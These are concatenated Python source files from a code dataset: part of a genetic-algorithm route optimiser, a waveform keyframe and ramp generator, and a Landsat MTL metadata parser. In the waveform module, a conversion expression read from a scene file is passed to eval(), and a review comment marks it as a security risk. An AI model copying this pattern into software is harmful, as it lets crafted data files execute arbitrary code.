        population.append(GenOrder.copy())
def calculate_fitness():
    """Score every tour in `population` (fitness = 1/length) and keep the
    best tour seen so far in `bestPopulation` / `recordGenDistance`."""
    global fitness, recordGenDistance, bestPopulation
    for tour in population:
        length = 0
        # As in find_optimal_path, the permutation's values are reused as
        # indices; every index appears once, so the full tour length is
        # still summed (in a scrambled order).
        for node in tour:
            if node + 1 < len(matrix):
                p = (matrix[tour[node]][0], matrix[tour[node]][1], 0)
                q = (matrix[tour[node + 1]][0], matrix[tour[node + 1]][1], 0)
                length += distance.euclidean(p, q)
        fitness += [1 / length]
        if length < recordGenDistance:
            bestPopulation = tour
            recordGenDistance = length
def normalize_fitness():
    """Rescale the global `fitness` list in place so it sums to 1."""
    total = sum(fitness)
    for i in range(len(fitness)):
        fitness[i] = fitness[i] / total
def select_population(arr, prop):
    """Roulette-wheel selection: pick an element of `arr` with probability
    proportional to the matching entry of `prop` (assumed normalized).

    Returns a copy of the selected element.

    Bug fix: the original drew ``random.randrange(1)``, which is always 0,
    so the wheel never spun and ``arr[-1]`` was always returned. Draw a
    float in [0, 1) with ``random.random()`` instead.
    """
    index = 0
    r = random.random()
    while r > 0:
        r = r - prop[index]
        index += 1
    index -= 1
    if index >= len(arr):
        # Guard against floating-point drift walking past the end.
        return arr[0].copy()
    return arr[index].copy()
def mutate(arr):
    """Make N attempts, each with probability 0.2, to swap a random element
    with its right neighbour (wrapping). Mutates `arr` in place and also
    returns it."""
    for _ in range(N):
        if random.random() < 0.2:
            left = random.randrange(len(arr))
            right = (left + 1) % N
            arr[left], arr[right] = arr[right], arr[left]
    return arr
def cross_over(arr_a, arr_b):
    """Ordered crossover: keep a random slice of `arr_a`, then append the
    missing genes in the order they appear in `arr_b`."""
    start = random.randrange(len(arr_b))
    if start + 1 == len(arr_a):
        # Slice would run to the end: the child is arr_a unchanged.
        return arr_a
    end = random.randrange(start + 1, len(arr_a))
    child = arr_a[start:end + 1].copy()
    for gene in arr_b:
        if gene not in child:
            child += [gene]
    return child
def next_generation():
    """Replace the global `population`: every member becomes a mutated
    crossover of the best tour with itself (roulette selection is
    currently disabled)."""
    global population
    offspring = []
    for _ in range(popSize):
        child = cross_over(bestPopulation.copy(), bestPopulation.copy())
        mutate(child)
        offspring.append(child)
    population = offspring
# Run the GA: seed a random population, score it, then evolve for 10
# generations starting from the precomputed best tour.
generate_population()
calculate_fitness()
normalize_fitness()
for _ in range(10):
    next_generation()
    calculate_fitness()
    normalize_fitness()
    print(recordGenDistance)
print(bestPopulation)
print(recordGenDistance)
# Draw the GA result in green, offset so it doesn't cover the white path.
draw_path('green', bestPopulation, 10)
root.mainloop()
| StarcoderdataPython |
5063639 | <gh_stars>0
"""Provides classes to build arbitrary waveforms."""
import json
import numpy as np
class KeyFrameList(object):
    """Basic timing element.

    Holds a list of keyframes. Each keyframe is a position in time relative
    to a parent keyframe. If the parent keyframe is None, the time is
    relative to the start of the ramp.

    All keyframe data is stored in the dictionary self.dct, keyed by the
    keyframe name:

        {
            "key_name_1": {
                "comment": "Info about this keyframe",
                "parent": "another_key_name",
                "time": 10.0
            },
            ...
        }

    Keyframes may additionally carry a "hooks" dict; refer to server.Hooks
    for details. Baking caches each keyframe's absolute time under the
    private key "__abs_time__".
    """

    def __init__(self, dct=None):
        # NOTE: with dct=None the instance is left uninitialized; callers
        # are expected to populate self.dct before use.
        if dct is None:
            return
        self.dct = dct
        # Check all parent keys are actually valid.
        for key in self.dct:
            kf = self.dct[key]
            parent_name = kf['parent']
            if parent_name is not None:
                if parent_name not in self.dct:
                    error_string = ('KeyFrame "' + key + '" has a parent "' +
                                    parent_name +
                                    '" which is not a known KeyFrame')
                    raise KeyError(error_string)
        self.is_baked = False
        # Find absolute times for all the keys.
        self.bake()

    def bake(self):
        """Find absolute times for all keys.

        The absolute time is cached in each keyframe dict under the key
        "__abs_time__".
        """
        self.unbake()
        for key in self.dct:
            self.get_absolute_time(key)
        self.is_baked = True

    def unbake(self):
        """Remove cached absolute times for all keys."""
        for key in self.dct:
            # pop __abs_time__ if it exists
            self.dct[key].pop('__abs_time__', None)
        self.is_baked = False

    def get_absolute_time(self, key):
        """Return the absolute time position of `key`, computing (and
        caching) it recursively from the parent chain if necessary."""
        keyframe = self.dct[key]
        try:
            # If absolute time is already calculated, return it.
            return keyframe['__abs_time__']
        except KeyError:
            # Otherwise, relative time plus the parent's absolute time.
            if keyframe['parent'] is None:
                keyframe['__abs_time__'] = keyframe['time']
            else:
                parent_time = self.get_absolute_time(keyframe['parent'])
                abs_time = keyframe['time'] + parent_time
                keyframe['__abs_time__'] = abs_time
            return keyframe['__abs_time__']

    def sorted_key_list(self):
        """Return the list of key names sorted by absolute time."""
        if not self.is_baked:
            self.bake()
        key_value_tuple = sorted(self.dct.items(),
                                 key=lambda x: x[1]['__abs_time__'])
        skl = [k[0] for k in key_value_tuple]
        return skl

    def set_time(self, key_name, new_time):
        """Set the relative time of a key and re-bake."""
        self.unbake()
        kf = self.dct[key_name]
        kf['time'] = new_time
        self.bake()

    def set_comment(self, key_name, new_comment):
        """Set the comment of a key."""
        kf = self.dct[key_name]
        kf['comment'] = new_comment

    def set_parent(self, key_name, new_parent):
        """Set the parent of a key and re-bake."""
        self.unbake()
        kf = self.dct[key_name]
        kf['parent'] = new_parent
        self.bake()

    def set_name(self, old_name, new_name):
        """Rename a keyframe, updating all children that point at it."""
        if old_name != new_name:
            self.unbake()
            self.dct[new_name] = self.dct[old_name]
            self.dct.pop(old_name)
            for key in self.dct:
                if self.dct[key]['parent'] == old_name:
                    self.dct[key]['parent'] = new_name
            self.bake()

    def add_keyframe(self, new_key_name, new_key_dict):
        """Add a keyframe and re-bake."""
        self.unbake()
        self.dct[new_key_name] = new_key_dict
        self.bake()

    def del_keyframe(self, key_name):
        """Delete a keyframe, re-parenting its children to its parent."""
        self.unbake()
        kf = self.dct[key_name]
        parent_key = kf['parent']
        # Find children of this keyframe.
        child_keys = [k for k in self.dct if self.dct[k]['parent'] == key_name]
        # Re-parent the children to the deleted key's parent.
        for ck in child_keys:
            self.dct[ck]['parent'] = parent_key
        # Remove the keyframe itself.
        self.dct.pop(key_name)
        self.bake()

    def is_ancestor(self, child_key_name, ancestor_key_name):
        """Return True if `ancestor_key_name` lies in the ancestry tree of
        `child_key_name` (a key counts as its own ancestor)."""
        # All keys are descendants of None.
        if ancestor_key_name is None:
            return True
        one_up_parent = self.dct[child_key_name]['parent']
        if child_key_name == ancestor_key_name:
            # Debatable semantics, but a key lies in its own ancestry tree.
            return True
        elif one_up_parent is None:
            return False
        else:
            return self.is_ancestor(one_up_parent, ancestor_key_name)

    def add_hook(self, key_name, hook_name, hook_dict):
        """Add hook `hook_name` to the keyframe `key_name`."""
        kf = self.dct[key_name]
        if 'hooks' not in kf:
            kf['hooks'] = {}
        kf['hooks'][str(hook_name)] = hook_dict

    def remove_hook(self, key_name, hook_name):
        """Remove and return a hook from the keyframe, if present."""
        kf = self.dct[key_name]
        if 'hooks' in kf:
            if hook_name in kf['hooks']:
                return kf['hooks'].pop(hook_name)

    def list_hooks(self, key_name):
        """Return a list of the names of all hooks attached to `key_name`."""
        kf = self.dct[key_name]
        if 'hooks' not in kf:
            return []
        else:
            # Bug fix: dict.iterkeys() is Python 2 only and raises
            # AttributeError on Python 3.
            return list(kf['hooks'])

    def get_hooks_list(self):
        """Return [(abs_time, [(hook_name, hook_dict), ...]), ...] for every
        keyframe that has hooks, in time order."""
        skl = self.sorted_key_list()
        hooks_list = []
        for key in skl:
            kf = self.dct[key]
            if 'hooks' in kf:
                hooks_dict = kf['hooks']
                # Bug fix: dict.iteritems() is Python 2 only.
                hooks_list.append((self.get_absolute_time(key),
                                   list(hooks_dict.items())))
        return hooks_list

    def do_keyframes_overlap(self):
        """Check for keyframe timing overlap (within 1e-6).

        Returns the name of the first overlapping keyframe, or None."""
        skl = self.sorted_key_list()
        for i in range(len(skl) - 1):
            this_time = self.dct[skl[i]]['__abs_time__']
            next_time = self.dct[skl[i + 1]]['__abs_time__']
            if abs(next_time - this_time) < 1e-6:
                # Keyframe times overlap.
                return skl[i]
        # All keyframes are separated in time.
        return None
class Channel(object):
"""Arbitrary waveform channel.
Holds all information to create an arbitrary waveform channel. Each channel
has the following attributes:
ch_name(str) - name of the channel
key_frame_list(KeyFrameList) - key frames to use for timing information.
dct(dict) - all channel data is here.
dct has the following structure:
{
"comment": "info about the channel.",
"id": "indentifier of the physical hardware channel.",
"type": "analog", # (or "digital")
"keys": {
# set of keyframes for which channel info is provided
"key_name_1":{
"ramp_type": "linear",
"ramp_data": {
"value": 1.0,
...
}
"state": True # only for digital channels
.
.
.
}
}
}
A ramp is defined by its value at certain keyframes and the kind of
interpolation between keyframes. The "keys" dict has all the keys for which
the ramp value is defined. At each keyframe, ramp_data has all the channel
information between that key and the next key.
"""
    def __init__(self, ch_name, dct=None, key_frame_list=None):
        """Create a channel named `ch_name` from dict `dct`, timed against
        the given KeyFrameList. With dct=None the instance is left
        uninitialized (same convention as KeyFrameList)."""
        if dct is None:
            return
        self.ch_name = ch_name
        self.dct = dct
        self.key_frame_list = key_frame_list
        # Drop channel data for keyframes that no longer exist.
        self.del_unused_keyframes()
        # conversion feature was added later. check if conversion field is
        # present. If not, added a conversion which is the same as input
        if self.dct['type'] == 'analog':
            if 'conversion' not in self.dct:
                # 'x' is the identity conversion expression.
                self.dct['conversion'] = 'x'
    def set_name(self, new_ch_name):
        """Sets the name of the channel.

        Note: only ch_name changes; the hardware id in self.dct['id'] is
        left untouched.
        """
        self.ch_name = new_ch_name
def del_unused_keyframes(self):
"""Scans through list of keyframes in the channel and removes those
which are not in self.key_frame_list."""
skl = self.key_frame_list.sorted_key_list()
unused_keys = [k for k in self.dct['keys']
if k not in skl]
for k in unused_keys:
del self.dct['keys'][k]
def change_key_frame_name(self, old_name, new_name):
key_dict = self.dct['keys']
if old_name in key_dict:
key_dict[new_name] = key_dict.pop(old_name)
def get_used_key_frames(self):
"""Returns a list of the keyframes used by this channel, sorted with
time. Each element in the list is a tuple. The first element is the
key_name and the second is the channel data at that keyframe."""
skl = self.key_frame_list.sorted_key_list()
# each element in used_key_frames is a tuple (key_name, key_dict)
used_key_frames = []
for kf in skl:
if kf in self.dct['keys']:
used_key_frames.append((kf, self.dct['keys'][kf]))
return used_key_frames
def get_used_key_frame_list(self):
"""Returns a list of the keyframes used by this channel, sorted with
time."""
skl = self.key_frame_list.sorted_key_list()
# each element in used_key_frames is a tuple (key_name, key_dict)
used_key_frames = []
for kf in skl:
if kf in self.dct['keys']:
used_key_frames.append(kf)
return used_key_frames
    def get_ramp_regions(self):
        """Returns a numpy array where each element corresponds to whether to
        ramp in that region or jump.

        A "region" is the interval between two consecutive keyframes in the
        parent KeyFrameList; entry 1 means an interpolated ramp crosses the
        region, 0 means the value jumps/holds there.
        """
        skl = self.key_frame_list.sorted_key_list()
        # One region between each adjacent pair of keyframes.
        ramp_or_jump = np.zeros(len(skl) - 1)
        used_key_frames = self.get_used_key_frame_list()
        for region_number, start_key in enumerate(skl[:-1]):
            if start_key in used_key_frames:
                key_data = self.dct['keys'][start_key]
                ramp_type = key_data['ramp_type']
                if ramp_type != "jump":
                    # this means that a ramp starts in this region. Figure
                    # out where it ends
                    curr_key_num = used_key_frames.index(start_key)
                    end_key_number = curr_key_num + 1
                    # figure out if the current key was the last key
                    if end_key_number < len(used_key_frames):
                        # if it wasnt, then find the end region
                        end_key_name = used_key_frames[end_key_number]
                        end_region_index = skl.index(end_key_name)
                        # Mark every region up to the ramp's end keyframe.
                        ramp_or_jump[region_number:end_region_index] = 1
        return ramp_or_jump
    def get_analog_ramp_data(self, ramp_regions, jump_resolution,
                             ramp_resolution):
        """Build the (time, value) sample arrays for an analog channel.

        Jump regions contribute a single sample at the region's start time;
        ramp regions are sampled every `ramp_resolution`. `jump_resolution`
        is currently unused. The values are passed through
        self.convert_voltage (defined elsewhere in this class) before being
        returned.
        """
        skl = self.key_frame_list.sorted_key_list()
        used_key_frame_list = self.get_used_key_frame_list()
        all_kf_times = np.array([self.key_frame_list.get_absolute_time(kf)
                                 for kf in skl])
        time_array_list = []
        n_points = 0
        # kf_positions[i] is the sample index at which keyframe skl[i] lands.
        kf_positions = []
        for region_number, ramp_or_jump in enumerate(ramp_regions):
            kf_positions.append(n_points)
            if ramp_or_jump == 0:
                # Jump region: one sample at the region's start keyframe.
                time_array_list.append(np.array([all_kf_times[region_number]]))
                n_points += 1
            else:
                start_time = all_kf_times[region_number]
                end_time = all_kf_times[region_number + 1]
                # find number of time steps
                n_time_steps = round((end_time-start_time)/ramp_resolution)
                time_array = start_time + np.arange(n_time_steps)*ramp_resolution
                # time_array = np.arange(start_time, end_time, ramp_resolution)
                time_array_list.append(time_array)
                n_points += len(time_array)
        # The final keyframe gets its own trailing sample.
        time_array_list.append([all_kf_times[-1]])
        time_array = np.concatenate(time_array_list)
        kf_positions.append(n_points)
        n_points += 1
        voltages = np.zeros(n_points, dtype=float)
        # Hold the first used key's value before it, and the last used key's
        # value after it.
        start_voltage = self.dct['keys'][used_key_frame_list[0]]['ramp_data']['value']
        end_voltage = self.dct['keys'][used_key_frame_list[-1]]['ramp_data']['value']
        start_index = skl.index(used_key_frame_list[0])
        end_index = skl.index(used_key_frame_list[-1])
        voltages[0:kf_positions[start_index]] = start_voltage
        voltages[kf_positions[end_index]:] = end_voltage
        for i, ukf in enumerate(used_key_frame_list[:-1]):
            start_pos = kf_positions[skl.index(ukf)]
            end_pos = kf_positions[skl.index(used_key_frame_list[i+1])]
            time_subarray = time_array[start_pos:end_pos]
            start_time = time_subarray[0]
            end_time = time_array[end_pos]
            value_final = self.dct['keys'][used_key_frame_list[i+1]]['ramp_data']['value']
            ramp_type = self.dct['keys'][used_key_frame_list[i]]['ramp_type']
            ramp_data = self.dct['keys'][used_key_frame_list[i]]['ramp_data']
            parms_tuple = (ramp_data, start_time, end_time, value_final,
                           time_subarray)
            # analog_ramp_functions maps ramp_type -> interpolation function;
            # presumably defined at module level (not visible here).
            ramp_function = analog_ramp_functions[ramp_type]
            voltage_sub = ramp_function(*parms_tuple)
            voltages[start_pos:end_pos] = voltage_sub
        return time_array, self.convert_voltage(voltages, time_array)
def generate_ramp(self, time_div=4e-3):
    """Return (time, voltage) arrays for this channel's full ramp.

    This function assumes a uniform time division throughout; the
    segment between each pair of consecutive used key frames is filled
    in by the ramp function named in the earlier frame's 'ramp_type'.

    time_div - time resolution of the ramp (seconds per sample).
    """
    # Analog channels produce a float voltage; digital channels an
    # unsigned integer bit pattern.
    if self.dct['type'] == 'analog':
        is_analog = True
    else:
        is_analog = False
    skl = self.key_frame_list.sorted_key_list()
    # each element in used_key_frames is a tuple (key_name, key_dict)
    used_key_frames = self.get_used_key_frames()
    max_time = self.key_frame_list.get_absolute_time(skl[-1]) + time_div
    num_points = int(round(max_time/time_div))
    time = np.arange(num_points) * time_div
    # time = np.arange(0.0, max_time, time_div)
    if is_analog:
        voltage = np.zeros(time.shape, dtype=float)
    else:
        voltage = np.zeros(time.shape, dtype='uint32')
    kf_times = np.array([self.key_frame_list.get_absolute_time(ukf[0])
                         for ukf in used_key_frames])
    # NOTE(review): kf_positions is a float array but is used directly as
    # slice bounds below; recent numpy versions require integer indices,
    # so this presumably relied on older behaviour — confirm and consider
    # rounding/casting to int.
    kf_positions = kf_times/time_div
    if is_analog:
        # set the start and the end part of the ramp
        start_voltage = used_key_frames[0][1]['ramp_data']['value']
        end_voltage = used_key_frames[-1][1]['ramp_data']['value']
        voltage[0:kf_positions[0]] = start_voltage
        voltage[kf_positions[-1]:] = end_voltage
    else:
        start_voltage = int(used_key_frames[0][1]['state'])
        end_voltage = int(used_key_frames[-1][1]['state'])
        voltage[0:kf_positions[0]] = start_voltage
        voltage[kf_positions[-1]:] = end_voltage
    # Fill each inter-keyframe segment with its ramp function's output.
    for i in range(len(kf_times)-1):
        start_time = kf_times[i]
        end_time = kf_times[i+1]
        start_index = kf_positions[i]
        end_index = kf_positions[i+1]
        time_subarray = time[start_index:end_index]
        ramp_type = used_key_frames[i][1]['ramp_type']
        ramp_data = used_key_frames[i][1]['ramp_data']
        if is_analog:
            # analog ramps interpolate towards the NEXT key frame's value
            value_final = used_key_frames[i+1][1]['ramp_data']['value']
        else:
            state = used_key_frames[i][1]['state']
        if is_analog:
            parms_tuple = (ramp_data, start_time, end_time, value_final,
                           time_subarray)
        else:
            parms_tuple = (ramp_data, start_time, end_time, state,
                           time_subarray)
        if is_analog:
            ramp_function = analog_ramp_functions[ramp_type]
        else:
            ramp_function = digital_ramp_functions[ramp_type]
        voltage_sub = ramp_function(*parms_tuple)
        voltage[start_index:end_index] = voltage_sub
    # finally use the conversion and return the voltage
    return time, self.convert_voltage(voltage, time)
def convert_voltage(self, voltage, time):
    """Apply the channel's calibration expression to an analog ramp.

    Digital ramps are returned unchanged.
    """
    if self.dct['type'] == 'analog':
        conversion_str = self.dct['conversion']
        # SECURITY(review): the conversion string from the scene file is
        # passed straight to eval(); only load scene files from trusted
        # sources.  The expression may reference x (raw values) and t
        # (the time array).
        return eval(conversion_str, {'x': voltage, 't': time})
    else:
        return voltage
# Analog Ramp functions
def analog_linear_ramp(ramp_data, start_time, end_time, value_final,
                       time_subarray):
    """Straight-line ramp from ramp_data['value'] at start_time to
    value_final at end_time, evaluated on time_subarray."""
    v_start = ramp_data["value"]
    frac = (time_subarray - start_time) / (end_time - start_time)
    return v_start * (1.0 - frac) + value_final * frac
def analog_linear2_ramp(ramp_data, start_time, end_time, value_final,
                        time_subarray):
    """Linear ramp towards ramp_data['value_final'] instead of the next
    key frame's value, giving a discontinuous jump at end_time.

    The value_final argument of the common ramp signature is ignored.
    """
    v_start = ramp_data["value"]
    v_target = ramp_data["value_final"]
    frac = (time_subarray - start_time) / (end_time - start_time)
    return v_start * (1.0 - frac) + v_target * frac
def analog_quadratic_ramp(ramp_data, start_time, end_time, value_final,
                          time_subarray):
    """Quadratic ramp with a prescribed initial slope.

    The curvature is chosen so the ramp reaches value_final at end_time.
    """
    v0 = ramp_data["value"]
    m = ramp_data["slope"]
    dt = end_time - start_time
    # curvature that makes v(end_time) == value_final
    a = (value_final - v0 - m * dt) / dt**2
    rel_t = time_subarray - start_time
    return v0 + m * rel_t + a * rel_t**2
def analog_quadratic2_ramp(ramp_data, start_time, end_time, value_final,
                           time_subarray):
    """Quadratic ramp with a prescribed curvature.

    The initial slope is chosen so the ramp reaches value_final at end_time.
    """
    v0 = ramp_data["value"]
    a = ramp_data["curvature"]
    dt = end_time - start_time
    # slope that makes v(end_time) == value_final
    m = (value_final - v0 - a * dt**2) / dt
    rel_t = time_subarray - start_time
    return v0 + m * rel_t + a * rel_t**2
def analog_exp_ramp(ramp_data, start_time, end_time, value_final,
                    time_subarray):
    """Exponential ramp with time constant ramp_data['tau'].

    The coefficients are chosen so the curve passes through
    (start_time, ramp_data['value']) and (end_time, value_final).
    A zero tau degenerates to a flat hold (jump ramp).
    """
    v0 = ramp_data["value"]
    tau = ramp_data["tau"]
    if tau == 0:
        # avoid the division by zero below; hold the initial value instead
        return analog_jump_ramp(ramp_data, start_time, end_time, value_final,
                                time_subarray)
    rel_t = time_subarray - start_time
    scale = (value_final - v0) / (np.exp((end_time - start_time) / tau) - 1.0)
    offset = v0 - scale
    return offset + scale * np.exp(rel_t / tau)
def analog_sine_ramp(ramp_data, start_time, end_time, value_final,
                     time_subarray):
    """Sinusoidal modulation around ramp_data['value'].

    Amplitude, frequency (Hz) and phase (rad) come from ramp_data;
    end_time and value_final are unused.
    """
    rel_t = time_subarray - start_time
    angle = 2.0 * np.pi * ramp_data['freq'] * rel_t + ramp_data['phase']
    return ramp_data['value'] + ramp_data['amp'] * np.sin(angle)
def analog_jump_ramp(ramp_data, start_time, end_time, value_final,
                     time_subarray):
    """Hold ramp_data['value'] for the whole segment; value_final is only
    reached by whatever segment follows."""
    return np.full(time_subarray.shape, ramp_data["value"], dtype=float)
def analog_cubic_ramp(ramp_data, start_time, end_time, value_final,
                      time_subarray):
    # NOTE(review): placeholder — "cubic" is declared in analog_ramp_types
    # with slope_left/slope_right parameters, but no cubic interpolation is
    # implemented yet; the segment simply holds the initial value.
    return analog_jump_ramp(ramp_data, start_time, end_time, value_final,
                            time_subarray)
# Digital ramp functions start here
def digital_jump_ramp(ramp_data, start_time, end_time, state,
                      time_subarray):
    """Hold the digital line at int(state) for the whole segment."""
    level = int(state)
    return np.full(time_subarray.shape, level, dtype=int)
def digital_pulsetrain_ramp(ramp_data, start_time, end_time, state,
                            time_subarray):
    """Square pulse train: high (== int(state)) during the first
    duty_cycle fraction of each period, low otherwise.

    'freq' is in Hz and 'phase' in radians (converted to cycles here).
    """
    cycles = (time_subarray - start_time) * ramp_data['freq']
    cycles = cycles + ramp_data['phase'] / np.pi / 2.0
    high = (cycles % 1.0) < ramp_data['duty_cycle']
    return np.array(high, dtype=int) * int(state)
# ramp_data keys that each analog ramp type expects (used by the editor UI
# to know which parameters a key frame of that type carries).
analog_ramp_types = {"jump": ["value"],
                     "quadratic": ["value", "slope"],
                     "linear": ["value"],
                     "linear2": ["value", "value_final"],
                     "cubic": ["value", "slope_left", "slope_right"],
                     "sine": ["value", "amp", "freq", "phase"],
                     "quadratic2": ["value", "curvature"],
                     "exp": ["value", "tau"]}
# ramp_data keys for each digital ramp type.
digital_ramp_types = {"jump": [],
                      "pulsetrain": ["freq", "phase", "duty_cycle"]}
# Dispatch tables mapping ramp_type name -> generator function.
analog_ramp_functions = {"jump": analog_jump_ramp,
                         "linear": analog_linear_ramp,
                         "linear2": analog_linear2_ramp,
                         "quadratic": analog_quadratic_ramp,
                         "cubic": analog_cubic_ramp,
                         "sine": analog_sine_ramp,
                         "quadratic2": analog_quadratic2_ramp,
                         "exp": analog_exp_ramp}
digital_ramp_functions = {"jump": digital_jump_ramp,
                          "pulsetrain": digital_pulsetrain_ramp}
if __name__ == '__main__':
    # Smoke test: load an example scene file and build its channel objects.
    with open('examples/test_scene.json', 'r') as f:
        data = json.load(f)
    kfl = KeyFrameList(data['keyframes'])
    channels = [Channel(ch_name, dct, kfl)
                for ch_name, dct in data['channels'].items()]
    ch = channels[0]
| StarcoderdataPython |
12842202 | from collections import defaultdict
from datetime import datetime
from typing import Any, Dict, List, Optional
from pyproj import Geod
from pystac.utils import str_to_datetime
from stactools.core.io import ReadHrefModifier
from stactools.core.io.xml import XmlElement
from stactools.core.projection import transform_from_bbox
from stactools.core.utils import map_opt
class MTLError(Exception):
    """Raised when an expected field cannot be found in MTL metadata."""
class MtlMetadata:
    """Parses a Collection 2 MTL XML file.
    References https://github.com/sat-utils/sat-stac-landsat/blob/f2263485043a827b4153aecc12f45a3d1363e9e2/satstac/landsat/main.py#L157
    """  # noqa

    def __init__(self,
                 root: XmlElement,
                 href: Optional[str] = None,
                 legacy_l8: bool = True):
        # legacy_l8 keeps Landsat 8 STAC Items consistent with previously
        # published content (see epsg, off_nadir and landsat_metadata).
        self._root = root
        self.href = href
        self.legacy_l8 = legacy_l8

    def _xml_error(self, item: str) -> MTLError:
        # Build a consistent "not found" error, including the file href
        # when one is known.
        return MTLError(f"Cannot find {item} in MTL metadata" +
                        ("" if self.href is None else f" at {self.href}"))

    def _get_text(self, xpath: str) -> str:
        # Required-field lookup; raises MTLError when missing.
        return self._root.find_text_or_throw(xpath, self._xml_error)

    def _get_float(self, xpath: str) -> float:
        return float(self._get_text(xpath))

    def _get_int(self, xpath: str) -> int:
        return int(self._get_text(xpath))

    @property
    def satellite_num(self) -> int:
        """Return the Landsat satellite number."""
        # Product IDs look like "LC08_...": chars 2-3 are the number.
        return int(self.product_id[2:4])

    @property
    def product_id(self) -> str:
        """Return the Landsat product ID."""
        return self._get_text("PRODUCT_CONTENTS/LANDSAT_PRODUCT_ID")

    @property
    def item_id(self) -> str:
        # Remove the processing date, as products IDs
        # that only vary by processing date represent the
        # same scene
        # See "Section 5 - Product Packaging" at
        # https://prd-wret.s3.us-west-2.amazonaws.com/assets/palladium/production/atoms/files/LSDS-1619_Landsat8-C2-L2-ScienceProductGuide-v2.pdf # noqa
        # ID format: LXSS_LLLL_PPPRRR_YYYYMMDD_yyyymmdd_CX_TX
        # remove yyyymmdd
        id_parts = self.product_id.split('_')
        id = '_'.join(id_parts[:4] + id_parts[-2:])
        return id

    @property
    def scene_id(self) -> str:
        """Return the Landsat scene ID."""
        return self._get_text("LEVEL1_PROCESSING_RECORD/LANDSAT_SCENE_ID")

    @property
    def processing_level(self) -> str:
        """Processing level. Determines product contents.
        Returns either 'L2SP' or 'L2SR', standing for
        'Level 2 Science Product' and 'Level 2 Surface Reflectance',
        respectively. L2SP has thermal + surface reflectance assets;
        L2SR only has surface reflectance.
        """
        return self._get_text("PRODUCT_CONTENTS/PROCESSING_LEVEL")

    @property
    def epsg(self) -> int:
        # A UTM_ZONE element means a UTM projection; otherwise the scene
        # uses Polar Stereographic.
        utm_zone = self._root.find_text('PROJECTION_ATTRIBUTES/UTM_ZONE')
        if utm_zone:
            if self.satellite_num == 8 and self.legacy_l8:
                # Keep current STAC Item content consistent for Landsat 8
                bbox = self.bbox
                utm_zone = self._get_text('PROJECTION_ATTRIBUTES/UTM_ZONE')
                center_lat = (bbox[1] + bbox[3]) / 2.0
                return int(f"{326 if center_lat > 0 else 327}{utm_zone}")
            else:
                # The projection transforms in the COGs provided by the USGS are
                # always for UTM North zones. The EPSG codes should therefore
                # be UTM north zones (326XX, where XX is the UTM zone number).
                # See: https://www.usgs.gov/faqs/why-do-landsat-scenes-southern-hemisphere-display-negative-utm-values # noqa
                utm_zone = self._get_text('PROJECTION_ATTRIBUTES/UTM_ZONE')
                return int(f"326{utm_zone}")
        else:
            # Polar Stereographic
            # Based on Landsat 8-9 OLI/TIRS Collection 2 Level 1 Data Format Control Book,
            # should only ever be 71 or -71
            lat_ts = self._get_text('PROJECTION_ATTRIBUTES/TRUE_SCALE_LAT')
            if lat_ts == "-71.00000":
                # Antarctic
                return 3031
            elif lat_ts == "71.00000":
                # Arctic
                return 3995
            else:
                raise MTLError(
                    f'Unexpeced value for PROJECTION_ATTRIBUTES/TRUE_SCALE_LAT: {lat_ts} '
                )

    @property
    def bbox(self) -> List[float]:
        # Might be cleaner to just transform the proj bbox to WGS84.
        lons = [
            self._get_float("PROJECTION_ATTRIBUTES/CORNER_UL_LON_PRODUCT"),
            self._get_float("PROJECTION_ATTRIBUTES/CORNER_UR_LON_PRODUCT"),
            self._get_float("PROJECTION_ATTRIBUTES/CORNER_LL_LON_PRODUCT"),
            self._get_float("PROJECTION_ATTRIBUTES/CORNER_LR_LON_PRODUCT")
        ]
        lats = [
            self._get_float("PROJECTION_ATTRIBUTES/CORNER_UL_LAT_PRODUCT"),
            self._get_float("PROJECTION_ATTRIBUTES/CORNER_UR_LAT_PRODUCT"),
            self._get_float("PROJECTION_ATTRIBUTES/CORNER_LL_LAT_PRODUCT"),
            self._get_float("PROJECTION_ATTRIBUTES/CORNER_LR_LAT_PRODUCT")
        ]
        # Expand the center-of-pixel corner coordinates by half a pixel,
        # converting the metre offset to degrees via geodesic distances.
        geod = Geod(ellps="WGS84")
        offset = self.sr_gsd / 2
        _, _, bottom_distance = geod.inv(lons[2], lats[2], lons[3], lats[3])
        bottom_offset = offset * (lons[3] - lons[2]) / bottom_distance
        _, _, top_distance = geod.inv(lons[0], lats[0], lons[1], lats[1])
        top_offset = offset * (lons[1] - lons[0]) / top_distance
        _, _, lat_distance = geod.inv(lons[0], lats[0], lons[2], lats[2])
        lat_offset = offset * (lats[0] - lats[2]) / lat_distance
        # NOTE(review): bottom_offset is applied to min(lons) and top_offset
        # to max(lons); confirm this asymmetry is intentional.
        return [
            min(lons) - bottom_offset,
            min(lats) - lat_offset,
            max(lons) + top_offset,
            max(lats) + lat_offset
        ]

    @property
    def proj_bbox(self) -> List[float]:
        # USGS metadata provide bounds at the center of the pixel, but
        # GDAL/rasterio transforms are to edge of pixel.
        # https://github.com/stac-utils/stactools/issues/117
        offset = self.sr_gsd / 2
        xs = [
            self._get_float(
                "PROJECTION_ATTRIBUTES/CORNER_UL_PROJECTION_X_PRODUCT") -
            offset,
            self._get_float(
                "PROJECTION_ATTRIBUTES/CORNER_UR_PROJECTION_X_PRODUCT") +
            offset,
            self._get_float(
                "PROJECTION_ATTRIBUTES/CORNER_LL_PROJECTION_X_PRODUCT") -
            offset,
            self._get_float(
                "PROJECTION_ATTRIBUTES/CORNER_LR_PROJECTION_X_PRODUCT") +
            offset
        ]
        ys = [
            self._get_float(
                "PROJECTION_ATTRIBUTES/CORNER_UL_PROJECTION_Y_PRODUCT") +
            offset,
            self._get_float(
                "PROJECTION_ATTRIBUTES/CORNER_UR_PROJECTION_Y_PRODUCT") +
            offset,
            self._get_float(
                "PROJECTION_ATTRIBUTES/CORNER_LL_PROJECTION_Y_PRODUCT") -
            offset,
            self._get_float(
                "PROJECTION_ATTRIBUTES/CORNER_LR_PROJECTION_Y_PRODUCT") -
            offset
        ]
        return [min(xs), min(ys), max(xs), max(ys)]

    @property
    def sr_shape(self) -> List[int]:
        """Shape for surface reflectance assets.
        Used for proj:shape. In [row, col] order"""
        return [
            self._get_int("PROJECTION_ATTRIBUTES/REFLECTIVE_LINES"),
            self._get_int("PROJECTION_ATTRIBUTES/REFLECTIVE_SAMPLES")
        ]

    @property
    def thermal_shape(self) -> Optional[List[int]]:
        """Shape for thermal bands.
        None if thermal bands not present.
        Used for proj:shape. In [row, col] order"""
        rows = map_opt(
            int, self._root.find_text("PROJECTION_ATTRIBUTES/THERMAL_LINES"))
        cols = map_opt(
            int, self._root.find_text("PROJECTION_ATTRIBUTES/THERMAL_SAMPLES"))
        if rows is not None and cols is not None:
            return [rows, cols]
